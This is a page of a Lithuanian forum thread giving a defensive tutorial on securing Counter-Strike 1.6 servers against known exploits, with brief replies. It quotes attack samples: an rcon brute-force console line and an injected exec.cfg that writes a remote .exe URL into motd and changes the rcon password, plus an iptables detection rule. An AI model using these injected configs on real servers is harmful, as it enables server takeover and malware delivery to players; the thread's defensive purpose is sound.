Dabar yra 2018 Spa 22 23:57




 Puslapis 14 [ 39 pranešimai(ų) ]  Eiti į 1, 2, 3, 4  Kitas
Autorius Žinutė
 Pranešimo tema: [Pamoka] Motd.txt ir kitos serverio apsaugos.
Žinutės numeris: #1  StandartinėParašytas: 2013 Bir 30 13:31 
Flooderis arba specialistas
Vartotojo avataras

Užsiregistravo: 2012 Lap 08 12:55
Pranešimai: 612
Karma: 28
Nesu pamokų kūrimo fanas, bet kiek matau reikia. Pamoka gali būti ne visiškai tiksli ir veiksminga, pateiksiu tik mintis, galimus variantus spręsti problemai, todėl vietoj tuščių komentarų geriau pasidalinkite savo informacija, problemų sprendimais.

Visų pirma atsinaujinam klientą bei dproto.Kliento Info čia. viewtopic.php?f=19&t=161
Dproto naujausią versiją galite rasti paskutinėse temose viewtopic.php?f=7&t=449 arba čia http://c-s.net.ua/forum/topic17628.html


Update 2015-01-18


Daugumos problemų galimą išvengti su SteamCMD, tačiau tada serveris bus tik steam only, kas mums nelabai tinka.

0.2 Pasikeičia motd paveiksliukas ir išsijungia serveris
(Pastebėjau su naujausiom dproto versijomis) 2015-01-18

Problema: Nusiunčia paveikslėlį su scriptu ir išjungia serverį su kill komanda nusiūsta tiesiai į linux serverį.
Pasėkmės: Serverio Lūžimas.
Sprendimas: Atsinaujinti dproto bei pasirūpinti kad server.cfg Fast Upload (Greitas atsiuntimas)
  1. sv_allowupload "0"
serverio_pavadinimas/cstrike

Reziume visos trys eilutės turėtų atrodyti taip:
  1. sv_allowdownload "1"
  2. sv_allowupload "0"
  3. sv_downloadurl "http://serverio_ip/cstrike/"


0.1 Laužimas su UTF-8 klaida (Kiek žinau dar oficialaus fix' iš steam nėra) 2014-09-08

Problema: Naudoja UTF-8 kaip netinkamą formatą
Pasėkmės: Serverio Lūžimas.
Sprendimas: Įdėti fix'intą plmenu.amxxx pluginą. amxmodx/plugins

Nuoroda į plmenu.sma plugino kodą: http://www.amxmodx.lt/viewtopic.php?p=29881#p29881
Tiesiog nukopijuoti i tuščia .sma failą ir sukompiliuoti localiai.

Kitas variantas šitas moduliukas: http://www.failai.lt/us3ro44nm3zd/utf_fix.rar.htm (Orpeu)

1. AutobuyFix (Nežinau ar naujausias build 5787 susitvarko su tuo, todėl vistiek pateiksiu nes asmeniškai gaunu info loguos apie šio bugo naudojimą)

Problema: Keičia kliento autobuy.txt.
Pasėkmės: Serverio Lūžimas.
Sprendimas: Įdėti autobuyfix.amxx pluginą. configs/plugins.ini

2 .HL Brute.
Problema: Bando atspėti jūsų rcon password, konsolės pvz:
  1. rcon 500661967 "pass" sv_contact "HL Brute 1.10"

Pasėkmės: Turi rcon valdai serverį, jei esi protingas tai ir duomenų bazę išdumpinsi.
Sprendimas: Yra keli variantai, pradėsiu nuo patikimiausio:

a) Ištrinti rcon password:
  1. rcon_password ""

b) Keisti rcon password į labai sudėtingą, pvz:
  1. rcon_password "545asdwqdas5dwqhfjk5456"

c) Įdėti anti_hlbrute_v1.1.Jam reikalingas Orpheu modulis: http://forums.alliedmods.net/showthread.php?t=116393

d) Įdėti string drop'ą į iptables, nukopijuoti tiesiogiai į ssh langą (putty).
  1. iptables -I INPUT -p udp -m string --algo kmp --string "XBrute" -j DROP

Jeigu pas jus kernel 2.6.18, įrašius viršuje pateiktą eilutę gali mesti error, kuris neranda tam tikro modulio, tačiau tai neturi jokios įtakos.
Jeigu viską padarėte teisingai tai parašius , turėtumėte pamatyti tekstą:
  1. STRING match "XBrute" ALGO name kmp TO 65535


Jeigu visgi pas jus nėra įrašytų iptables, įsirašom jas su:
  1. apt-get update && apt-get install iptables
  2. /etc/init.d/iptables start


Papildomai: Siųlyčiau iš server.cfg rcon password perkelti į amxx.cfg
Bei įdėti limitą rcon spėjimų skaičiui:
  1. sv_rcon_banpenalty 0
  2. sv_rcon_minfailures 3
  3. sv_rcon_maxfailures 3
  4. sv_rcon_minfailuretime 30


3. HLDS Fake Players Flood.
Problema: Serverio floodinimas netikrais žaidėjais.
Pasėkmės: Serverio lagas/lūžimas.
Sprendimas: aarnas pamoka viewtopic.php?f=19&t=2577

4. Color Transit chat Bug. Littel_Exploit
Problema: say %s %d chat buginimas.
Pasėkmės: Pakimba žaidėjai, nesimato dalies chat ir Hud tekstų.
Sprendimas: Įsidėti colored_translit.amxx configs/plugins.ini , colored_translit folderį į scripting, nes kitaip nekompiliuos.

5. Motd.txt keitimas, .cfg failų nusiuntimas į serverį. Raiz0 Exploit
Problema: Nusiunčia failus į serverį .cfg, kurie keičia rcon pasword. exec.cfg pavyzdys po Exploit panaudojimo:
  1. motdfile motd.txt
  2. motd_write http://31.200.239.201/cstrike.exe
  3. amxx pause rcon_defencer
  4. amxx rcon_password Evil_guy

Pasėkmės: Tokios pat kaip su Problema Nr.2
Sprendimas: Variantų gana nemažai, bet ne visi patikrinti bei ne 100% Patikimumas.

a) Visų pirma reikia atsikratyti į serverį atsiųstais failais, bet prieš ką nors darant būtinai išjunkite serverį.
  1. cstrike/addons/metamod
- direktorijoje exec.cfg failą ištriname.
  1. cstrike/addons/amxmodx/configs/maps
- direktorijoje ištrinam main.cfg, prefix_cs.cfg, prefix_de.cfg bei kitus .cfg failus su įtartinu turiniu.

Papildomai siųlyčiau patikrinti visas direktorijas ar kur nors kitur nėra įtartinų .cfg failų.
WinSCP: ALT+F7 search laukelyje, paieškokite exec.cfg, autoexec.cfg failų.

b) Keičiame failų/folderių priegos teises. cmod 0444 (0444 = 444).
Sudedame cmod 444 ant failų server.cfg motd.txt, bei ant direktorijų metamod, configs/maps.
Pavyzdys su WinSCP: Properties-Permissions, laukelyje parašyti 0444 arba palikti varneles prie R.

Pavyzdys su ssh(putty):
  1. chmod -R 444 metamod

c) Įdėti redaguotą Crock engine_i686.so engine failą.
Linux: engine_i686.7z
Win: swds_p2.7z


d) Išjungti motd langą.
https://forums.alliedmods.net/showthread.php?t=105242

e) Forume radau, kad kažkam neva padėjo tai, nors nelabai tikėtina:
  1. <html>
  2. <frameset cols="*" framespacing="0" frameborder="no" border="0">
  3. <frame src="http://saitas.lt/folderis/motd.html" name="frame_main" />
  4. </frameset>


f) Dedam filewatcher pluginą, kuris saugo/tikrina failus. Logs folderyje spausdinama visa plugino veikla.
Jam taipogi reikalingas Orpheu modulis, kur parsiųsti minėjau anksčiau. Orpheu versija būtina 2.3, su 2.5 neveiks.

Failo nuoroda:
viewtopic.php?f=19&t=3207

FS_Open failą dedam į orpheu folderį, filewatcher.cfg į amxmodx/configs, filewatcher.amxx į plugins folderį.

g) Jeigu asmuo jus hackinantis yra protingas, jis sugebės užblokuoti, išjungti pluginus, kuriais nuo to ginatės, tiesiog nuskaitydamas jūsų plugin direktoriją ir atsirinkdamas, kurie failai atlieka blokavimo funkciją, tai pasiūlymas būtų toks, keisti .amxx failų pavadinimus į nesukeliančius įtarimo, pvz:
  1. more_dmg.amxx fire_in_the_hole.amxx

Arba galite tiesiog išjungti amx_pausecfg komandą išjundami pluginą plugins.ini


h) Dar vienas galimas variantas, plugino pagalba paleisti, motd kitokiu pavadinimu, kad "hackeris" nerastų orginalaus motd.txt
Prisegiau 2 failus: kitą motd, ir pluginuką jo naudojimui, .txt pavadinimą pakeitus, būtinai pakeiskite ir .sma faile pavadinimą:
  1. server_cmd("second_motd.txt")


6. Nuotolinis motd.

Idėja būtų tokia, motd failą pasiekti nuotoliniu budu, kokiame nors ftp naudojantis pluginu, deja tokio neradau, bet manau tikrai įmanoma sukurti, pačiam deja kol kas neužtenka įgudzių. Galbūt mūsų geriausieji aarnas ir hleV padės šiuo klausimu.

Kaip ir minėjau pateikite savo variantus, kaip tvarkotės su įvairiais exploit.


Prikabinti failai:
Failo aprašymas: Linux.
engine_i686.7z [288.08 KiB]
Atsisiųsta 319 kartus(ų)
Failo aprašymas: Win.
swds_p2.7z [614.02 KiB]
Atsisiųsta 205 kartus(ų)
anti_hlbrute_v1.1.zip [474.98 KiB]
Atsisiųsta 347 kartus(ų)
colored_translit_fix_bag.zip [8.78 KiB]
Atsisiųsta 279 kartus(ų)
autobuyfix.7z [6.51 KiB]
Atsisiųsta 282 kartus(ų)


Paskutinį kartą redagavo V1LKAS 2015 Vas 08 15:23. Iš viso redaguota 17 kartus.
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #2  StandartinėParašytas: 2013 Bir 30 17:42 
Vyr. diskusijų administratorius
Vartotojo avataras

Užsiregistravo: 2010 Rgp 31 13:21
Pranešimai: 3891
Karma: 183
Šaunu, sticked.



_________________
Palikau CS pasaulį ;/ . Nebepasiekiamas.
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #3  StandartinėParašytas: 2013 Bir 30 18:58 
Gana aktyvus vartotojas

Užsiregistravo: 2012 Bir 30 17:52
Pranešimai: 311
Karma: 7
cmod 0444 ir cmod 444 kuom nors skiriasi?


Paskutinį kartą redagavo GhostMan 2013 Bir 30 18:59. Iš viso redaguota 1 kartą.


_________________
NWK.LT Counter-Strike 1.6 Serveriai:
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #4  StandartinėParašytas: 2013 Bir 30 21:57 
Jau po truputį tampa savu
Vartotojo avataras

Užsiregistravo: 2012 Sau 03 21:38
Pranešimai: 149
Karma: 8

Miestas: Šilutė
GhostMan rašė:
cmod 0444 ir cmod 444 kuom nors skiriasi?

Nesiskiria.



_________________
Paveikslėlis
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #5  StandartinėParašytas: 2013 Lie 01 18:03 
Jau po truputį tampa savu
Vartotojo avataras

Užsiregistravo: 2011 Bir 01 19:30
Pranešimai: 113
Karma: 2

Miestas: Telsiai
O krtais skiresi ne tipu, sftp chmod 0444 o ftp chmod 444? :S:



_________________
Paveikslėlis

http://www.naujokai.net
http://www.naujokai.net
http://www.naujokai.net
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #6  StandartinėParašytas: 2013 Lie 04 23:16 
Flooderis arba specialistas
Vartotojo avataras

Užsiregistravo: 2012 Lap 08 12:55
Pranešimai: 612
Karma: 28
Cituoti:
xDede rašė:
O krtais skiresi ne tipu, sftp chmod 0444 o ftp chmod 444? :S:

Skirtumas tik tas per kur pasiekiamas serveris, ar per command menu ar per ftp. be to ftp ir swift ftp (sftp) neturi jokio skirtumo (jokios skirtingos sintaksės) permisions valdyme. Todėl i have no idea that u are talking about


Atnaujinau 6 punktą su g), h) dalimis bei prisidegu reikiamą failą, kadangi pagrindiniam poste jau limitas, tikiuosi administracija priseks prie jo, o aš kol kas palieku čia.


Prikabinti failai:
motd.rar [301 Baitų]
Atsisiųsta 200 kartus(ų)
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #7  StandartinėParašytas: 2013 Lie 04 23:19 
AMX Mod X ekspertai
Vartotojo avataras

Užsiregistravo: 2011 Bal 02 11:23
Pranešimai: 867
Karma: 71

Miestas: Šiauliai


METŲ NARYS
Nepridėtas autobuyfix.sma, yra tik .amxx.



_________________
Paveikslėlis ← RIP best userbar
DISKUSIJA: KIETAS PLUGIN'O UŽSAKOVAS
Privačios pagalbos neteikiu!
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #8  StandartinėParašytas: 2013 Lie 04 23:28 
Flooderis arba specialistas
Vartotojo avataras

Užsiregistravo: 2012 Lap 08 12:55
Pranešimai: 612
Karma: 28
Ačiū kad pažiūrėjai, prisegu, -beta update šita problema sutvarkyta, bet visgi tiems kurie naudoja senesnį build gal pravers.


Prikabinti failai:
autobuy_fix.sma [2.47 KiB]
Atsisiųsta 268 kartus(ų)
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #9  StandartinėParašytas: 2013 Lie 12 09:35 
Moderatorius
Vartotojo avataras

Užsiregistravo: 2012 Rgp 03 01:12
Pranešimai: 4350
Karma: 123

Miestas: Vilnius
apsaugo nuo motd exploito gal Paveikslėlis
http://makeserver.kz/plugins-cs16/20506 ... rvera.html
Anti HLBrute v1.2
http://makeserver.kz/plugins-cs16/21065 ... e-v12.html



_________________
Paveikslėlis
Paveikslėlis
Paveikslėlis
Atsijungęs
 Aprašymas  
 
 Pranešimo tema: Re: [Pamoka] Motd.txt ir kitos apsaugos.
Žinutės numeris: #10  StandartinėParašytas: 2013 Lie 20 12:09 
O taip. Jis jau surinko 50 žinučių!

Užsiregistravo: 2011 Bal 03 14:38
Pranešimai: 98
Karma: 0
Jeigu as is server.cfg rcon esu istrynes, o irasiau ji i paleidimo eilute visvien ji gali suzinot?



_________________
Paveikslėlis
Atsijungęs
 Aprašymas  
 
Rodyti paskutinius pranešimus:  Rūšiuoti pagal  
 Puslapis 14 [ 39 pranešimai(ų) ]  Eiti į 1, 2, 3, 4  Kitas


Dabar prisijungę

Vartotojai naršantys šį forumą: Registruotų vartotojų nėra ir 1 svečias


Jūs negalite kurti naujų temų šiame forume
Jūs negalite atsakinėti į temas šiame forume
Jūs negalite redaguoti savo pranešimų šiame forume
Jūs negalite trinti savo pranešimų šiame forume
Jūs negalite prikabinti failų šiame forume

Ieškoti:
Pereiti į:  

cron